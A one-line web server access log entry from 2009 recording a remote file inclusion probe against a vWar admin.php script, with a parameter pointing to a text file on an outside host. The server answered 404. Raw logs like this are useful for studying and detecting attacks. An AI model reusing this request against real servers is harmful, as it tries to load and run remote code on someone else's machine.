123.142.0.221 - - [31/Mar/2009:11:20:36 -0500] "GET /logs/access_log.1235347200//modules/vwar/admin/admin.php?vwar_root=http://www.xgamex.org/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
